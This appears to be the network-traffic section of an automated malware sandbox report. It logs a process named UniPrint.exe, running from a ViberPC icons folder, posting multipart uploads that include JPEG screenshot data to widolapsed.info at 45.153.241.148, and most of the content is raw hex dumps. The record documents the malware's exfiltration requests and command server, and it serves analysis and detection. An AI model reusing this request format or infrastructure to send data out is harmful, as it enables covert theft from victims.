                                                                                                      2021-09-15 11:46:31 UTC2213OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:31 UTC2229OUTData Raw: a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f f7 a5
                                                                                                      Data Ascii: M6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/
                                                                                                      2021-09-15 11:46:31 UTC2245OUTData Raw: a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16
                                                                                                      Data Ascii: (()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64.
                                                                                                      2021-09-15 11:46:31 UTC2256OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 36 33 37 34 35 34 30 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1263745405--
                                                                                                      2021-09-15 11:46:32 UTC2256INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:31 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=1943433717168773c3c7d1693b89b6c2cd68d0e8384afe77e8c223cc0b705860; expires=Thu, 15-Sep-2022 11:46:31 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:32 UTC2256INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.34982045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:32 UTC2256OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76644
                                                                                                      Content-Type: multipart/form-data; boundary=--------3327901999
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 32 37 39 30 31 39 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3327901999Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9c d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:32 UTC2257OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:32 UTC2273OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:32 UTC2289OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:32 UTC2305OUTData Raw: 4c a5 86 7d 5a 46 4e 29 e2 37 3c 05 27 f0 ad 13 a9 69 f1 ff 00 ab b5 27 eb 48 75 c0 bf ea ad 63 1f 5a 3d a5 47 b4 43 d8 53 5b c8 a8 b6 93 b7 48 cf e5 56 ed 34 db 8f 34 31 43 d6 a3 6d 76 e8 fd d0 8b f4 14 c4 d5 6f 1e 45 cc a7 04 f6 15 32 55 9a 34 a6 a8 46 4b 76 5c f1 9a ed 86 d4 1f 4a e5 f4 ff 00 f9 08 db ff 00 d7 45 ae 9b c6 24 b5 b5 a1 3d 4a d7 33 a7 ff 00 c8 46 df fe ba 0f e7 4b 0f fc 03 ae b7 f1 8f 42 d4 52 dc cc 1a 69 42 9c 74 aa 46 6d 36 3e ae 4d 56 f1 21 22 f5 70 7f 86 b1 7a f7 ac 28 50 e6 82 6d 93 89 c6 72 54 71 51 3a 03 a9 e9 e9 f7 22 26 98 75 c8 97 fd 5d b8 ac 2a 2b 75 85 87 53 91 e3 ea f4 36 1b 5f 9b f8 23 51 50 3e b3 76 dd 1b 1f 4a ce a2 a9 61 e9 ae 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f
                                                                                                      Data Ascii: L}ZFN)7<'i'HucZ=GCS[HV441CmvoE2U4FKv\JE$=J3FKBRiBtFm6>MV!"pz(PmrTqQ:"&u]*+uS6_#QP>vJaOY-rzVtj9jVZo
                                                                                                      2021-09-15 11:46:32 UTC2321OUTData Raw: 45 25 14 00 b4 94 b4 50 02 51 45 14 00 51 45 14 00 b4 52 51 40 0b 4b 4d a5 a0 42 d2 51 45 00 2e 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 5a 29 29 69 88 29 69 28 a6 01 45 14 52 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 4a 5a 60 14 51 45 02 16 8a 4a 28 01 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 28 a2 8a 62 16 92 8a 28 01 68 a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57
                                                                                                      Data Ascii: E%PQEQERQ@KMBQE.hJ(hZ))i)i(ER((JZ`QEJ(hJ(h(b(h((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW
                                                                                                      2021-09-15 11:46:32 UTC2332OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 32 37 39 30 31 39 39 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3327901999--
                                                                                                      2021-09-15 11:46:33 UTC2332INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:32 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=2faa08828d158c60692f0a51d618251283995aae994b683b354664956d66a7dc; expires=Thu, 15-Sep-2022 11:46:32 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:33 UTC2332INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.34975545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:28 UTC230OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81262
                                                                                                      Content-Type: multipart/form-data; boundary=--------3571177622
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:28 UTC230OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 31 31 37 37 36 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3571177622Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:28 UTC230OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ac c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:28 UTC231OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:28 UTC246OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:28 UTC262OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:28 UTC278OUTData Raw: 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63 b3 4e 06 a3 a7 8a 4d 14 98 fa 51 4d 14 b5 26 89 8e a7 0a 60 34 ec 8a 45 26 3b 34 e1 4c cd 2e 4d 4b 45 a6 49 45 34 13 4b f5 34 9a 29 31 e2 97 22 a3 de 83 ab 0f ce 98 d7 30 27 57 06 97 2b 0e 74 ba 96 41 f9 4f d2 b8 cf 14 7f c7 ec 5f f5 c8 57 4c 75 28 17 20 64 d7 33 e2 53 9b b8 4f fd 32 1f ce aa 31 6b 70 53 52 96 87 17 45 15 b9 78 52 1f 0b e9 c6 39 74 f8 de 68 5c bc 6f 6a 1a 69 4f 9a c3 21 f6 1c 60 0f ef 0e 95 c0 dd ac 7a e9 5c c4 a5 0c ca ac 15 88 0c 30 c0 1e bd eb aa d5 20 b7 93 c5 13 5a 93 61 2d bd b9 9a 41 6d 6d 6d e5 30 d8 85 82 3b 04 5c e7 18 e0 9e f5 56 d9 5f 50 8e d2 4b 85 d3 1e 3b c3 35 ba 7d 9e d8 46 f1 ca 50 15 07 08
                                                                                                      Data Ascii: zVtj9jVZovK)iX&S74ZcNMQM&`4E&;4L.MKEIE4K4)1"0'W+tAO_WLu( d3SO21kpSRExR9th\ojiO!`z\0 Za-Ammm0;\V_PK;5}FP
                                                                                                      2021-09-15 11:45:28 UTC294OUTData Raw: f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 64 b7 77 d0 04 79 ed 2d 84 6d 22 21 29 70 c4 8d cc 17 38 28 33 d7 d6 9f 23 fe 9a 17 3a fe 93 2f d1 45 15 05 85 79 5f c5 8f f9 0c d9 7f d7 03 fc eb d5 2b ca fe 2c 7f c8 66 cb fe b8 1f e7 5a
                                                                                                      Data Ascii: n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZSdwy-m"!)p8(3#:/Ey_+,fZ
                                                                                                      2021-09-15 11:45:28 UTC310OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 31 31 37 37 36 32 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3571177622--
                                                                                                      2021-09-15 11:45:29 UTC310INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:28 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=43262f698fff9a2fe2aebfa507a36e50eec0556c6974b71976afaec779f20479; expires=Thu, 15-Sep-2022 11:45:28 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:29 UTC310INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.34982145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:33 UTC2332OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76640
                                                                                                      Content-Type: multipart/form-data; boundary=--------1002864139
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 30 32 38 36 34 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1002864139Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
